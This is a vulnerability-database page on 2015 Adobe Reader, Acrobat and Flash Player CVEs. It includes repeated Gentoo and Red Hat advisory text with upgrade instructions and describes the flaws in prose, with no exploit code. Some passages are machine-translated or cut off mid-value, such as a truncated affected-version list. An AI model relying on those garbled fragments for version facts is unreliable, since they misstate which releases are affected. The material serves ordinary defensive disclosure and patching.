VARIoT IoT vulnerabilities database
| VAR-201510-0040 | CVE-2015-7615 | Windows and Mac OS X Run on Adobe Reader and Acrobat of SaveAs Vulnerability to execute arbitrary code in function |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Use-after-free vulnerability in a SaveAs feature in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7617, and CVE-2015-7621. This vulnerability CVE-2015-5586 , CVE-2015-6683 , CVE-2015-6684 , CVE-2015-6687 , CVE-2015-6688 , CVE-2015-6689 , CVE-2015-6690 , CVE-2015-6691 , CVE-2015-7617 ,and CVE-2015-7621 Is a different vulnerability. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. http://cwe.mitre.org/data/definitions/416.htmlAn attacker could execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of PDF documents with media content. When trying to save a specially crafted PDF document, a dangling pointer can be forced to be reused after it has been freed. Failed exploit attempts will likely cause a denial-of-service condition. Adobe Reader, etc. are all products of Adobe (Adobe) in the United States. Adobe Reader is a free PDF file reader; Acrobat is a PDF file editing and conversion tool; Acrobat Reader DC is a set of tools for viewing, printing and annotating PDF. A use-after-free vulnerability exists in the SaveAs function of several Adobe products. 30060 and earlier, Acrobat XI Desktop 11.0.12 and earlier, Reader XI Desktop 11.0.12 and earlier, Acrobat X Desktop 10.1.15 and earlier, Reader X Desktop 10.1.15 and earlier
| VAR-201510-0039 | CVE-2015-7614 | Windows and Mac OS X Run on Adobe Reader and Acrobat In JavaScript API Vulnerability that circumvents execution restrictions |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions and execute arbitrary commands via an app.launchURL call, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623. This vulnerability CVE-2015-6707 , CVE-2015-6708 , CVE-2015-6709 , CVE-2015-6710 , CVE-2015-6711 , CVE-2015-6712 , CVE-2015-6713 , CVE-2015-6714 , CVE-2015-6715 , CVE-2015-6716 , CVE-2015-6717 , CVE-2015-6718 , CVE-2015-6719 , CVE-2015-6720 , CVE-2015-6721 , CVE-2015-6722 , CVE-2015-6723 , CVE-2015-6724 , CVE-2015-6725 , CVE-2015-7616 , CVE-2015-7618 , CVE-2015-7619 , CVE-2015-7620 ,and CVE-2015-7623 Is a different vulnerability.By the attacker, app.launchURL Via call JavaScript API Execution restrictions may be avoided and arbitrary commands may be executed. Authentication is not required to exploit this vulnerability. The specific flaw exists within handling URL's passed to app.launchURL. A specially crafted cURL passed to app.launchURL can force a command to be executed. A remote attacker could exploit this vulnerability to execute arbitrary code in the context of the process. Adobe Acrobat and Reader are prone to multiple security-bypass vulnerabilities.
An attacker can exploit these issues to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Adobe Reader, etc. are all products of Adobe (Adobe) in the United States. Adobe Reader is a free PDF file reader; Acrobat is a PDF file editing and conversion tool; Acrobat Reader DC is a set of tools for viewing, printing and annotating PDF. Classic and Continuous are two update mechanisms provided by Acrobat Reader DC Product Download Center. Security flaws exist in several Adobe products. 30060 and earlier, Acrobat XI Desktop 11.0.12 and earlier, Reader XI Desktop 11.0.12 and earlier, Acrobat X Desktop 10.1.15 and earlier, Reader X Desktop 10.1.15 and earlier
| VAR-201510-0051 | CVE-2015-7626 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 18.0.0.252 and 19.x before 19.0.0.207 on Windows and OS X and before 11.2.202.535 on Linux, Adobe AIR before 19.0.0.213, Adobe AIR SDK before 19.0.0.213, and Adobe AIR SDK & Compiler before 19.0.0.213 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-7625, CVE-2015-7627, CVE-2015-7630, CVE-2015-7633, and CVE-2015-7634. This vulnerability CVE-2015-7625 , CVE-2015-7627 , CVE-2015-7630 , CVE-2015-7633 ,and CVE-2015-7634 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. Security flaws exist in several Adobe products. The following products and versions are affected: Adobe Flash Player Desktop Runtime 19.0.0.185 and earlier versions and Extended Support Release 18.0.0.241 and earlier versions based on Windows and Macintosh platforms, AIR Desktop Runtime 19.0.0.190 and earlier versions, based on Windows, Macintosh, Adobe Flash Player for Google Chrome 19.0.0.185 and earlier on Linux and ChromeOS, Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.185 and earlier on Windows 10, Adobe Flash Player on Windows 8.0 and 8.1 For Internet Explorer 10 and 11 19.0.0.185 and earlier versions, Adobe Flash Player for Linux 11.2.202.521 and earlier versions based on Linux platforms, AIR SDK 19.0.0.190 and earlier versions and AIR SDK based on Windows, Macintosh, Android and iOS platforms & Compiler 19.0.0.190 and earlier.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.548"
References
==========
[ 1 ] CVE-2015-5569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5569
[ 2 ] CVE-2015-7625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7625
[ 3 ] CVE-2015-7626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7626
[ 4 ] CVE-2015-7627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7627
[ 5 ] CVE-2015-7628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7628
[ 6 ] CVE-2015-7629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7629
[ 7 ] CVE-2015-7630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7630
[ 8 ] CVE-2015-7631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7631
[ 9 ] CVE-2015-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7632
[ 10 ] CVE-2015-7633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7633
[ 11 ] CVE-2015-7634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7634
[ 12 ] CVE-2015-7643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7643
[ 13 ] CVE-2015-7644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7644
[ 14 ] CVE-2015-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7645
[ 15 ] CVE-2015-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7646
[ 16 ] CVE-2015-7647
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7647
[ 17 ] CVE-2015-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7648
[ 18 ] CVE-2015-7651
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7651
[ 19 ] CVE-2015-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7652
[ 20 ] CVE-2015-7653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7653
[ 21 ] CVE-2015-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7654
[ 22 ] CVE-2015-7655
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7655
[ 23 ] CVE-2015-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7656
[ 24 ] CVE-2015-7657
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7657
[ 25 ] CVE-2015-7658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7658
[ 26 ] CVE-2015-7659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7659
[ 27 ] CVE-2015-7660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7660
[ 28 ] CVE-2015-7661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7661
[ 29 ] CVE-2015-7662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7662
[ 30 ] CVE-2015-7663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7663
[ 31 ] CVE-2015-8042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8042
[ 32 ] CVE-2015-8043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8043
[ 33 ] CVE-2015-8044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8044
[ 34 ] CVE-2015-8046
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8046
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201511-02
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:1893-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1893.html
Issue date: 2015-10-15
CVE Names: CVE-2015-5569 CVE-2015-7625 CVE-2015-7626
CVE-2015-7627 CVE-2015-7628 CVE-2015-7629
CVE-2015-7630 CVE-2015-7631 CVE-2015-7632
CVE-2015-7633 CVE-2015-7634 CVE-2015-7643
CVE-2015-7644
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities, detailed in the Adobe Security Bulletin APSB15-25 listed
in the References section, could allow an attacker to create a specially
crafted SWF file that would cause flash-plugin to crash, execute arbitrary
code, or disclose sensitive information when the victim loaded a page
containing the malicious SWF content.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1271383 - flash-plugin: multiple code execution issues fixed in APSB15-25
1271388 - flash-plugin: information leak and hardening fixes in APSB15-25
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-5569
https://access.redhat.com/security/cve/CVE-2015-7625
https://access.redhat.com/security/cve/CVE-2015-7626
https://access.redhat.com/security/cve/CVE-2015-7627
https://access.redhat.com/security/cve/CVE-2015-7628
https://access.redhat.com/security/cve/CVE-2015-7629
https://access.redhat.com/security/cve/CVE-2015-7630
https://access.redhat.com/security/cve/CVE-2015-7631
https://access.redhat.com/security/cve/CVE-2015-7632
https://access.redhat.com/security/cve/CVE-2015-7633
https://access.redhat.com/security/cve/CVE-2015-7634
https://access.redhat.com/security/cve/CVE-2015-7643
https://access.redhat.com/security/cve/CVE-2015-7644
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-25.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWH5NuXlSAg2UNWIIRAvqkAJ9lON9Rky8IogN+LkeEn3KgxxlWIACfeHmR
muWHgTd958nNy5EHHzsSy4I=
=T7iE
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201510-0053 | CVE-2015-7628 | Adobe Flash Player issue where iframe contents may be overwritten |
CVSS V2: 5.0 CVSS V3: 5.4 Severity: MEDIUM |
Adobe Flash Player before 18.0.0.252 and 19.x before 19.0.0.207 on Windows and OS X and before 11.2.202.535 on Linux, Adobe AIR before 19.0.0.213, Adobe AIR SDK before 19.0.0.213, and Adobe AIR SDK & Compiler before 19.0.0.213 allow remote attackers to bypass the Same Origin Policy and obtain sensitive information via unspecified vectors. Adobe Flash Player contains an issue where the same-origin policy may be bypassed leading to iframe contents being overwritten. Tokuji Akamine reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Processing specially crafted Flash content may lead to iframe contents being overwritten.
An attacker can exploit this issue to bypass certain same-origin policy restrictions and obtain sensitive information; this may aid in launching further attacks. Security flaws exist in several Adobe products. The following products and versions are affected: Adobe Flash Player Desktop Runtime 19.0.0.185 and earlier versions and Extended Support Release 18.0.0.241 and earlier versions based on Windows and Macintosh platforms, AIR Desktop Runtime 19.0.0.190 and earlier versions, based on Windows, Macintosh, Adobe Flash Player for Google Chrome 19.0.0.185 and earlier on Linux and ChromeOS, Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.185 and earlier on Windows 10, Adobe Flash Player on Windows 8.0 and 8.1 For Internet Explorer 10 and 11 19.0.0.185 and earlier versions, Adobe Flash Player for Linux 11.2.202.521 and earlier versions based on Linux platforms, AIR SDK 19.0.0.190 and earlier versions and AIR SDK based on Windows, Macintosh, Android and iOS platforms & Compiler 19.0.0.190 and earlier.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.548"
References
==========
[ 1 ] CVE-2015-5569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5569
[ 2 ] CVE-2015-7625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7625
[ 3 ] CVE-2015-7626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7626
[ 4 ] CVE-2015-7627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7627
[ 5 ] CVE-2015-7628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7628
[ 6 ] CVE-2015-7629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7629
[ 7 ] CVE-2015-7630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7630
[ 8 ] CVE-2015-7631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7631
[ 9 ] CVE-2015-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7632
[ 10 ] CVE-2015-7633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7633
[ 11 ] CVE-2015-7634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7634
[ 12 ] CVE-2015-7643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7643
[ 13 ] CVE-2015-7644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7644
[ 14 ] CVE-2015-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7645
[ 15 ] CVE-2015-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7646
[ 16 ] CVE-2015-7647
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7647
[ 17 ] CVE-2015-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7648
[ 18 ] CVE-2015-7651
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7651
[ 19 ] CVE-2015-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7652
[ 20 ] CVE-2015-7653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7653
[ 21 ] CVE-2015-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7654
[ 22 ] CVE-2015-7655
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7655
[ 23 ] CVE-2015-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7656
[ 24 ] CVE-2015-7657
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7657
[ 25 ] CVE-2015-7658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7658
[ 26 ] CVE-2015-7659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7659
[ 27 ] CVE-2015-7660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7660
[ 28 ] CVE-2015-7661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7661
[ 29 ] CVE-2015-7662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7662
[ 30 ] CVE-2015-7663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7663
[ 31 ] CVE-2015-8042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8042
[ 32 ] CVE-2015-8043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8043
[ 33 ] CVE-2015-8044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8044
[ 34 ] CVE-2015-8046
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8046
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201511-02
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:1893-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1893.html
Issue date: 2015-10-15
CVE Names: CVE-2015-5569 CVE-2015-7625 CVE-2015-7626
CVE-2015-7627 CVE-2015-7628 CVE-2015-7629
CVE-2015-7630 CVE-2015-7631 CVE-2015-7632
CVE-2015-7633 CVE-2015-7634 CVE-2015-7643
CVE-2015-7644
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. These
vulnerabilities, detailed in the Adobe Security Bulletin APSB15-25 listed
in the References section, could allow an attacker to create a specially
crafted SWF file that would cause flash-plugin to crash, execute arbitrary
code, or disclose sensitive information when the victim loaded a page
containing the malicious SWF content. (CVE-2015-5569, CVE-2015-7625,
CVE-2015-7626, CVE-2015-7627, CVE-2015-7628, CVE-2015-7629, CVE-2015-7630,
CVE-2015-7631, CVE-2015-7632, CVE-2015-7633, CVE-2015-7634, CVE-2015-7643,
CVE-2015-7644)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 11.2.202.535.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1271383 - flash-plugin: multiple code execution issues fixed in APSB15-25
1271388 - flash-plugin: information leak and hardening fixes in APSB15-25
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-5569
https://access.redhat.com/security/cve/CVE-2015-7625
https://access.redhat.com/security/cve/CVE-2015-7626
https://access.redhat.com/security/cve/CVE-2015-7627
https://access.redhat.com/security/cve/CVE-2015-7628
https://access.redhat.com/security/cve/CVE-2015-7629
https://access.redhat.com/security/cve/CVE-2015-7630
https://access.redhat.com/security/cve/CVE-2015-7631
https://access.redhat.com/security/cve/CVE-2015-7632
https://access.redhat.com/security/cve/CVE-2015-7633
https://access.redhat.com/security/cve/CVE-2015-7634
https://access.redhat.com/security/cve/CVE-2015-7643
https://access.redhat.com/security/cve/CVE-2015-7644
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-25.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWH5NuXlSAg2UNWIIRAvqkAJ9lON9Rky8IogN+LkeEn3KgxxlWIACfeHmR
muWHgTd958nNy5EHHzsSy4I=
=T7iE
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201510-0050 | CVE-2015-7625 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 18.0.0.252 and 19.x before 19.0.0.207 on Windows and OS X and before 11.2.202.535 on Linux, Adobe AIR before 19.0.0.213, Adobe AIR SDK before 19.0.0.213, and Adobe AIR SDK & Compiler before 19.0.0.213 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-7626, CVE-2015-7627, CVE-2015-7630, CVE-2015-7633, and CVE-2015-7634. This vulnerability CVE-2015-7626 , CVE-2015-7627 , CVE-2015-7630 , CVE-2015-7633 ,and CVE-2015-7634 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. Security flaws exist in several Adobe products. The following products and versions are affected: Adobe Flash Player Desktop Runtime 19.0.0.185 and earlier versions and Extended Support Release 18.0.0.241 and earlier versions based on Windows and Macintosh platforms, AIR Desktop Runtime 19.0.0.190 and earlier versions, based on Windows, Macintosh, Adobe Flash Player for Google Chrome 19.0.0.185 and earlier on Linux and ChromeOS, Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.185 and earlier on Windows 10, Adobe Flash Player on Windows 8.0 and 8.1 For Internet Explorer 10 and 11 19.0.0.185 and earlier versions, Adobe Flash Player for Linux 11.2.202.521 and earlier versions based on Linux platforms, AIR SDK 19.0.0.190 and earlier versions and AIR SDK based on Windows, Macintosh, Android and iOS platforms & Compiler 19.0.0.190 and earlier.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.548"
References
==========
[ 1 ] CVE-2015-5569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5569
[ 2 ] CVE-2015-7625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7625
[ 3 ] CVE-2015-7626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7626
[ 4 ] CVE-2015-7627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7627
[ 5 ] CVE-2015-7628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7628
[ 6 ] CVE-2015-7629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7629
[ 7 ] CVE-2015-7630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7630
[ 8 ] CVE-2015-7631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7631
[ 9 ] CVE-2015-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7632
[ 10 ] CVE-2015-7633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7633
[ 11 ] CVE-2015-7634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7634
[ 12 ] CVE-2015-7643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7643
[ 13 ] CVE-2015-7644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7644
[ 14 ] CVE-2015-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7645
[ 15 ] CVE-2015-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7646
[ 16 ] CVE-2015-7647
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7647
[ 17 ] CVE-2015-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7648
[ 18 ] CVE-2015-7651
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7651
[ 19 ] CVE-2015-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7652
[ 20 ] CVE-2015-7653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7653
[ 21 ] CVE-2015-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7654
[ 22 ] CVE-2015-7655
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7655
[ 23 ] CVE-2015-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7656
[ 24 ] CVE-2015-7657
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7657
[ 25 ] CVE-2015-7658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7658
[ 26 ] CVE-2015-7659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7659
[ 27 ] CVE-2015-7660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7660
[ 28 ] CVE-2015-7661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7661
[ 29 ] CVE-2015-7662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7662
[ 30 ] CVE-2015-7663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7663
[ 31 ] CVE-2015-8042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8042
[ 32 ] CVE-2015-8043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8043
[ 33 ] CVE-2015-8044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8044
[ 34 ] CVE-2015-8046
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8046
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201511-02
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
